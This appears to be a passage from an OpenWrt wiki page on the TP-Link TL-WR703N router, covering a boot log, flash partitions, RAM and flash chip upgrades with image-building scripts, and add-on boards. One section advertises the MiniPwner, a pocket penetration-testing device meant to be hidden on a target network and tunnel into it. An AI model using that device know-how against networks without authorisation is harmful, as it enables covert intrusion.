init started: BusyBox v1.01 (2011.04.01-07:49+0000) multi-call binary
====>slow_led_expire 621: here
===>slow_led_expire 636: on
This Board use 2.6.31
xt_time: kernel timezone is -0000
nf_conntrack version 0.5.0 (512 buckets, 5120 max)
====>slow_led_expire 621: here
===>slow_led_expire 625: off
ip_tables: (C) 2000-2006 Netfilter Core Team
insmod: cannot open module `/lib/modules/2.6.31/kernel/iptable_raw.ko': No such file or directory
====>slow_led_expire 621: here
===>slow_led_expire 636: on
insmod: cannot open module `/lib/modules/2.6.31/kernel/flashid.ko': No such file or directory
PPPoL2TP kernel driver, V1.0
PPTP driver version 0.8.3
insmod: cannot open module `/lib/modules/2.6.31/kernel/harmony.ko': No such file or directory
====>slow_led_expire 621: here
===>slow_led_expire 625: off
(none) mips #128 Fri Aug 26 14:58:53 CST 2011 (none)
(none) login: Now flash open!
Now flash open!
====>slow_led_expire 621: here
===>slow_led_expire 636: on
ATHR_GMAC: Length per segment 1536
ATHR_GMAC: fifo cfg 3 01f00140
ATHR_GMAC: Mac address for unit 1:bf1f0006
ATHR_GMAC: 12:64:c3:58:67:a4
ATHR_GMAC: Max segments per packet : 1
ATHR_GMAC: Max tx descriptor count : 40
ATHR_GMAC: Max rx descriptor count : 96
ATHR_GMAC: Mac capability flags : 4D83
ATHR_GMAC: Mac address for unit 0:bf1f0000
ATHR_GMAC: 01:9c:b5:c8:b7:c9
====>slow_led_expire 621: here
===>slow_led_expire 625: off
ATHR_GMAC: Max segments per packet : 1
ATHR_GMAC: Max tx descriptor count : 40
ATHR_GMAC: Max rx descriptor count : 252
ATHR_GMAC: Mac capability flags : 4403
athr_gmac_ring_alloc Allocated 640 at 0x81e77800
athr_gmac_ring_alloc Allocated 4032 at 0x81d63000
Setting Drop CRC Errors, Pause Frames and Length Error frames
Setting PHY...mac 0
====>slow_led_expire 621: here
===>slow_led_expire 636: on
====>slow_led_expire 621: here
===>slow_led_expire 625: off
====>slow_led_expire 621: here
===>slow_led_expire 636: on
athr_gmac_ring_alloc Allocated 640 at 0x81e77400
athr_gmac_ring_alloc Allocated 1536 at 0x81f25000
====>slow_led_expire 621: here
===>slow_led_expire 625: off
====>slow_led_expire 621: here
===>slow_led_expire 636: on
athr_gmac_mii_setup: MDC check failed
Setting Drop CRC Errors, Pause Frames and Length Error frames
ATHRS26: resetting s26
ATHRS26: s26 reset done
Setting PHY...mac 1
====>slow_led_expire 621: here
===>slow_led_expire 625: off
device eth0 entered promiscuous mode
Now flash open!
====>slow_led_expire 621: here
===>slow_led_expire 636: on
====>slow_led_expire 621: here
===>slow_led_expire 625: off
====>slow_led_expire 621: here
===>slow_led_expire 636: on
nf_conntrack_rtsp v0.6.21 loading
nf_nat_rtsp v0.6.21 loading
====>slow_led_expire 621: here
===>slow_led_expire 625: off
asf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
====>slow_led_expire 621: here
===>slow_led_expire 636: on
ath_hal: 0.9.17.1 (AR9380, DEBUG, REGOPS_FUNC, WRITE_EEPROM, 11D)
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
====>slow_led_expire 621: here
===>slow_led_expire 625: off
====>slow_led_expire 621: here
ath_ahb: 9.2.0_U5.508 (Atheros/multi-bss)
Boostrap clock 25MHz
ar9300RadioAttach: Need analog access recipe!!
Restoring Cal data from Flash
ath_get_caps[4735] rx chainmask mismatch actual 1 sc_chainmak 0
ath_get_caps[4710] tx chainmask mismatch actual 1 sc_chainmak 0
wifi0: Atheros 9380: mem=0xb8100000, irq=2
wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1
wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1.
VAP device ath0 created
DES SSID SET=TP-LINK_620550
ieee80211_scan_unregister_event_handler: Failed to unregister evhandler=c0a048a0 arg=81fa8ac0
wlan_vap_delete : enter. vaphandle=0x80e60000
wlan_vap_delete : exit. vaphandle=0x80e60000
wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1
wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1.
VAP device ath0 created
DES SSID SET=TP-LINK_620550
ieee80211_ioctl_siwmode: imr.ifm_active=393856, new mode=3, valid=1
WARNING: Fragmentation with HT mode NOT ALLOWED!!
device ath0 entered promiscuous mode
br0: port 2(ath0) entering forwarding state
ieee80211_ioctl_siwmode: imr.ifm_active=1442432, new mode=3, valid=1
br0: port 2(ath0) entering disabled state
DES SSID SET=TP-LINK_620550
br0: port 2(ath0) entering forwarding state


MTD

cat /proc/mtd

dev:    size   erasesize  name
mtd0: 00020000 00010000 "u-boot"
mtd1: 000d9fa8 00010000 "kernel"
mtd2: 002f6058 00010000 "rootfs"
mtd3: 000f0000 00010000 "rootfs_data"
mtd4: 00010000 00010000 "art"
mtd5: 003d0000 00010000 "firmware"

USB port and monitoring Serial Console via USB-Serial

The USB port on the WR703n is not compatible with USB1 devices (aka full speed) and only works properly with USB2 (aka high speed) devices. You can, however, plug in a USB-Serial adapter as long as you plug it in through a <$10 USB2 hub. While you're at it, use another USB port to plug in a USB key and write data there (like serial console logs) so as not to wear out the built-in flash.

See this page for more tips and how to create a serial console server out of your WR703n: http://marc.merlins.org/perso/linux/post_2012-12-05_Serial-Console-With-WR703N.html

GPS Tracking Example

Here is a recipe for GPS tracking using a USB GPS module: https://forum.openwrt.org/viewtopic.php?pid=185438

Software Mods

DIY Projects

Bootloader Mods

Hardware Mods

Note: If you are a beginner, you should inform yourself about soldering in general and even then obtain some experience!

Here are some interesting hardware modifications for the TL-WR703N, from the OpenWrt forum:

Webradio device

This project implements a webradio with a cheap USB sound card and a speaker from an old mobile phone within the casing of the router. There are two analogue controllers for selecting the stream and the volume. For this, an ATtiny85 is connected to the UART.

Building a tiny webradio with analog volume and tune controller

64MB RAM Mod

The device uses a DDR1 16Mbit x 16bit (16Mibit*16=256 mebibit. 256 mebibit/8=32MiByte) 400MHz chip, the Zentel A3S56D40FTP. Replace it with any 32Mbit x 16bit chip. 333MHz instead of 400MHz also works fine. These chips are quite hard to find. One way to get them is to look at DDR SO-DIMMs (because SO-DIMM modules are shipped with x16 chips). Since there are no 64Mbit x 16bit DDR1 chips available, there is no 128 MB mod!

The easiest approach is to look for a 4-chip DDR 256 MB module. These all have x16 chips too. Chips on only one side (not to be confused with double-sided 256 MB modules with 4 chips on each side) and only 4 of them: that's the best chance to get some. They make up a small percentage compared with the usual 8-chip modules, but this is offset by the number and "cheap as dirt" price of such DDR 256 MB modules.

A chip can also be salvaged from a dead HDD with 64Mb cache, for example the 2Tb Western Digital WD2002FYPS.

Working chips:

Additional list that may work:

Type ID Code Vendor
DDR 32Mx16 DDR 400 TSOP Pb Free HY5DU121622DTP-D43-C Hynix
DDR 32Mx16 DDR 400 TSOP Pb Free H5DU5162ETR-E3C Hynix
DDR 32Mx16 DDR 400 Pb Free K4H511638J-LCCC Samsung
DDR 32Mx16 DDR 400 A3S12D40ETP-G5 Zentel
DDR 32Mx16 DDR 400 NT5DS32M16BS-5T Nanya
DDR 32Mx16 DDR 400 PB Free P3S12D40ETP-GUTT Mira
DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16TG-6T:F Micron
DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16P-6T:F Micron
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CE-6 Qimonda
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CEL-6 Qimonda
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160DE-6 Qimonda

By default, the router is able to see all 64MB.

root@OpenWrt:~# free
             total         used         free       shared      buffers
Mem:         61864        48044        13820            0        30316

16MB Flash Mod

Remarks

Create a working image

To replace the 4MB flash chip with a 16MB one, first dump two important partitions:

After dumping the memory, use dd to extract the second and the last block.

#!/bin/sh
# block size -> 64k
bs=65536
ls -l flash_dump
# -rw-rw-r-- 1 makefu makefu 4194304 Mar 21 10:28 flash_dump
# size of the dump in bytes (wc -c avoids parsing the ls output)
flash_size=$(wc -c < flash_dump)
#             4194304 / 65536
num_blocks=$((flash_size / bs))
# 64 blocks, 64 kilobytes each
# second block of the dump
dd if=flash_dump of=data.bin bs=$bs count=1 skip=1
# last block of the dump (the "art" partition)
dd if=flash_dump of=art.bin bs=$bs count=1 skip=$((num_blocks - 1))

After that you can cat together your new image:

# new image size
new_image_size=16777216
# block size -> 64k, as in the script above
bs=65536
# padding: everything except the bootloader, data and art blocks
truncate --size $((new_image_size - 3 * bs)) whitespace.bin

# build pepe2k bootloader at first: see https://github.com/pepe2k/u-boot_mod
cat uboot_for_tp-link_tl-wr703n.bin \
    data.bin \
    whitespace.bin \
    art.bin > wr703_bootloader_data_whitespace_art.bin

Flash this image onto your new chip with your SPI programmer and solder the chip in. You can now hold the button for 3 seconds (it will blink each second) and release it to make the bootloader start an httpd at 192.168.1.1.
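
Before flashing, the assembled image can be checked against the original dump: total size, the second block and the last (art) block carried over unchanged, and an art block that is not blank. This script is an added example, not part of the original wiki page; the function names, the script name verify.sh and the random sample built by make_sample are assumptions for illustration.

```shell
#!/bin/sh
# Added example: check an assembled 16MB image against the original flash dump.
bs=65536                 # 64k block size, as in the scripts above
new_image_size=16777216  # size of the replacement chip

# block FILE N: write 64k block number N (0-based) of FILE to stdout
block() { dd if="$1" bs="$bs" skip="$2" count=1 2>/dev/null; }

# same_block A NA B NB: true if block NA of A equals block NB of B
same_block() {
    [ "$(block "$1" "$2" | sha256sum)" = "$(block "$3" "$4" | sha256sum)" ]
}

# blank_block FILE N: true if the block is all 0x00 or all 0xFF
blank_block() {
    [ "$(block "$1" "$2" | LC_ALL=C tr -d '\000' | wc -c)" -eq 0 ] ||
    [ "$(block "$1" "$2" | LC_ALL=C tr -d '\377' | wc -c)" -eq 0 ]
}

# verify_layout DUMP IMAGE: 0 if OK, 1 bad size, 2 data block differs,
# 3 art block differs or is misplaced, 4 art block is blank
verify_layout() {
    dump_size=$(wc -c < "$1"); image_size=$(wc -c < "$2")
    [ "$image_size" -eq "$new_image_size" ] || return 1
    [ "$dump_size" -ge $((2 * bs)) ] || return 1
    [ $((dump_size % bs)) -eq 0 ] || return 1
    last_dump=$((dump_size / bs - 1)); last_image=$((image_size / bs - 1))
    same_block "$1" 1 "$2" 1 || return 2
    same_block "$1" "$last_dump" "$2" "$last_image" || return 3
    if blank_block "$2" "$last_image"; then return 4; fi
    return 0
}

# make_sample DIR: build a constructed dump (random bytes, not a real device
# dump) and an image assembled the same way as on this page
make_sample() {
    head -c $((64 * bs)) /dev/urandom > "$1/flash_dump"
    head -c "$bs" /dev/urandom > "$1/uboot.bin"
    head -c $((253 * bs)) /dev/zero > "$1/whitespace.bin"
    { cat "$1/uboot.bin"; block "$1/flash_dump" 1
      cat "$1/whitespace.bin"; block "$1/flash_dump" 63; } > "$1/image.bin"
}

# Usage: sh verify.sh flash_dump wr703_bootloader_data_whitespace_art.bin
if [ $# -eq 2 ]; then verify_layout "$1" "$2"; echo "verify_layout: $?"; fi
```

A non-zero result means the image should not be flashed; result 3 or 4 in particular means the art block would be lost or empty on the new chip.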

MiniPwner Home

The MiniPwner's key features include:

Integrated Wired and Wireless connections: Once plugged into a target network, the Mini-Pwner can establish an SSH tunnel through the target network, or can be accessed by wifi. In addition, the MiniPwner can be configured as a wifi sniffer and logger - wardriving in your pocket.

Low power consumption, can be run off battery: With the 1700 mAh battery included in the kit, the Mini-Pwner will run for over five hours of active wired and wireless activity. No need to find a power outlet during the pen test.

Multiple Pen Testing Tools included: tcpdump, nmap, kismet, all come pre-installed.

Flexible and Expandable: The MiniPwner runs on the open source OpenWrt operating system. You can easily add or change the installed packages.

Small size: The MiniPwner can be easily carried in a pocket, hidden behind a telephone, or hung from a jack by a short ethernet cable.

There are many other creative ways to use the MiniPwner. Here is a list of some of the software that comes installed:

Web - http://www.minipwner.com/

WR703N Expander board and case

Kean Electronics, in conjunction with the Sydney Hackerspace, has developed the WR703N Expander board as Open Hardware. All schematics are available online on their website - http://www.kean.com.au/oshw/WR703N/

Connector Info

WebI2C: I2C,SPI,1-Wire

I2CCHIP has put a hardware serial bus interface inside. Fully built up, this will work immediately out of the box, and any configuration can be done completely from the browser.

WebI2C

ASCII commands control the I2C, SPI, and 1-Wire buses using the BL233 chip.

The firmware supports autonomous data collection to the internal webserver, serial-over-network control, remote-over-internet access, and webcam snapshots from the internet. The webpage allows editing of the I2C commands, logging shell scripts, JavaScript display functions, etc. The webpage also lets you convert the raw I2C data to readable values with some simple JavaScript.

Why would you do I2C this way, instead of bit-bashing the I/O pins in software?
